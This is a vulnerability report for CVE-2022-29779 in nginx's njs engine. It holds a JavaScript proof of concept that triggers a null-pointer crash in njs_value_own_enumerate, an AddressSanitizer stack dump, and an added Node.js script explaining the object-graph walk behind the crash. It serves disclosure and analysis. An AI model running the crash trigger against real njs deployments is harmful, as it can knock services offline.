CVE-2022-29779: SEGV src/njs_value.c:240 in njs_value_own_enumerate · Issue #485 · nginx/njs
Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_value_own_enumerate at src/njs_value.c.
Environment
OS : Linux leanderwang-LC2 5.13.0-30-generic #33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
PoC
```js
function main() {
    // A plain object despite the name; it is the single element of arr1.
    var empty_arr = {};
    var arr1 = [empty_arr];
    var arr2 = new Uint8Array();
    // Prototype swap: the typed array now inherits from an Array, so
    // Array.prototype.splice becomes callable on it.
    arr2.__proto__ = arr1;
    // Spread of the string "bigint": splice("b", "i", "g", "i", "n", "t").
    var arr3 = arr2.splice(..."bigint");
    // Park the splice result on a builtin constructor so it is reachable
    // from the global object graph.
    Promise.valueOf = arr3;
    // Array length far beyond the limit: the error raised here is the one
    // whose backtrace construction crashes (see the stack dump).
    var v9 = Array(0x20000000000000);
}
main();
```
Stack dump
```
AddressSanitizer:DEADLYSIGNAL
==2523460==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x555b64452f1c bp 0x7ffdcdd97650 sp 0x7ffdcdd97520 T0)
==2523460==The signal is caused by a READ memory access.
==2523460==Hint: address points to the zero page.
    #0 0x555b64452f1b in njs_value_own_enumerate src/njs_value.c:240
    #1 0x555b6448d019 in njs_object_traverse src/njs_object.c:1230
    #2 0x555b644df091 in njs_builtin_match_native_function src/njs_builtin.c:726
    #3 0x555b644d26cb in njs_add_backtrace_entry src/njs_error.c:1309
    #4 0x555b644d26cb in njs_error_stack_new src/njs_error.c:102
    #5 0x555b644d26cb in njs_error_stack_attach src/njs_error.c:161
    #6 0x555b6446455e in njs_vmcode_interpreter src/njs_vmcode.c:985
    #7 0x555b644bbaba in njs_function_lambda_call src/njs_function.c:703
    #8 0x555b644620fb in njs_vmcode_interpreter src/njs_vmcode.c:788
    #9 0x555b6445c0ba in njs_vm_start src/njs_vm.c:553
    #10 0x555b644453f8 in njs_process_script src/njs_shell.c:890
    #11 0x555b64445ebf in njs_process_file src/njs_shell.c:619
    #12 0x555b6444721f in main src/njs_shell.c:303
    #13 0x7f301e32b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
    #14 0x555b64442c4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/njs_value.c:240 in njs_value_own_enumerate
==2523460==ABORTING
```
Credit
xmzyshypnc(@xmzyshypnc) and P1umer(@P1umer)
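The stack dump above places the null-pointer read not in `splice` or `Array()` but in an error path: `njs_error_stack_new` -> `njs_add_backtrace_entry` -> `njs_builtin_match_native_function` -> `njs_object_traverse` -> `njs_value_own_enumerate`, i.e. njs is walking objects and enumerating their own properties while building the backtrace for the error that `Array(0x20000000000000)` raises. The script below is an added example, not code from the issue or from the njs code base. It rebuilds the PoC's object graph in a conforming engine (Node.js) and runs a breadth-first walk over own data properties, starting from `globalThis`, to show that a value parked at `Promise.valueOf` is exactly what such a walk reaches. That the njs traversal starts at the global object is an assumption (the page shows only the call chain), and the helper names `buildPoCGraph`, `findPath` and `triggerAndClassify` are mine.

```javascript
'use strict';

// Same setup as the reported PoC, minus the final Array(...) call.
// Returns the splice result so a caller can search for it.
function buildPoCGraph() {
  const emptyArr = {};
  const arr1 = [emptyArr];
  const arr2 = new Uint8Array();
  // Prototype swap: Array.prototype.splice becomes reachable on a typed array.
  arr2.__proto__ = arr1;
  // splice("b", "i", "g", "i", "n", "t"): start 0, deleteCount 0, four inserted items.
  // In a conforming engine the out-of-bounds typed-array writes are no-ops and the
  // result is a fresh empty Array.
  const arr3 = arr2.splice(...'bigint');
  // Hang the result off a builtin constructor so it is reachable from the global graph.
  Promise.valueOf = arr3;
  return arr3;
}

// Breadth-first search over own *data* properties (accessors are never invoked, so the
// walk has no side effects) plus the prototype link. Returns the shortest property path
// from `root` to `target` as an array of names, or null if `target` is unreachable.
// This mirrors the shape of an object-graph traversal such as njs_object_traverse; it is
// not njs's algorithm (assumption).
function findPath(root, target, maxNodes = 200000) {
  const seen = new Set([root]);
  const queue = [{ obj: root, path: [] }];
  let visited = 0;
  while (queue.length && visited < maxNodes) {
    const { obj, path } = queue.shift();
    visited++;
    const edges = [];
    try {
      for (const name of Object.getOwnPropertyNames(obj)) {
        const desc = Object.getOwnPropertyDescriptor(obj, name);
        if (desc && 'value' in desc) edges.push([name, desc.value]);
      }
      const proto = Object.getPrototypeOf(obj);
      if (proto !== null) edges.push(['__proto__', proto]);
    } catch (_) {
      continue; // exotic objects (e.g. revoked proxies) may refuse introspection
    }
    for (const [name, value] of edges) {
      if (value === target) return path.concat(name);
      const isObj = (typeof value === 'object' && value !== null) || typeof value === 'function';
      if (isObj && !seen.has(value)) {
        seen.add(value);
        queue.push({ obj: value, path: path.concat(name) });
      }
    }
  }
  return null;
}

// The PoC's final statement in a conforming engine: 0x20000000000000 exceeds the maximum
// array length, so Array(...) throws a RangeError. The njs crash happens while this
// error's backtrace is being built, not inside Array() itself.
function triggerAndClassify() {
  try {
    Array(0x20000000000000);
    return 'no error';
  } catch (e) {
    return e instanceof RangeError ? 'RangeError' : e.constructor.name;
  }
}

function main() {
  const arr3 = buildPoCGraph();
  const path = findPath(globalThis, arr3);
  console.log('splice result reachable at globalThis.' + (path ? path.join('.') : '<unreachable>'));
  console.log('Array(0x20000000000000) ->', triggerAndClassify());
}
main();
```

Run with `node poc_graph_walk.js`. The point of the walk is that anything a script attaches to a builtin becomes input to every later traversal of the global graph, including ones that run on error paths the script never calls directly; a fuzzer-produced PoC like this one exploits exactly that, which is why the crashing frame is in `njs_value_own_enumerate` rather than in the statement that created the odd object.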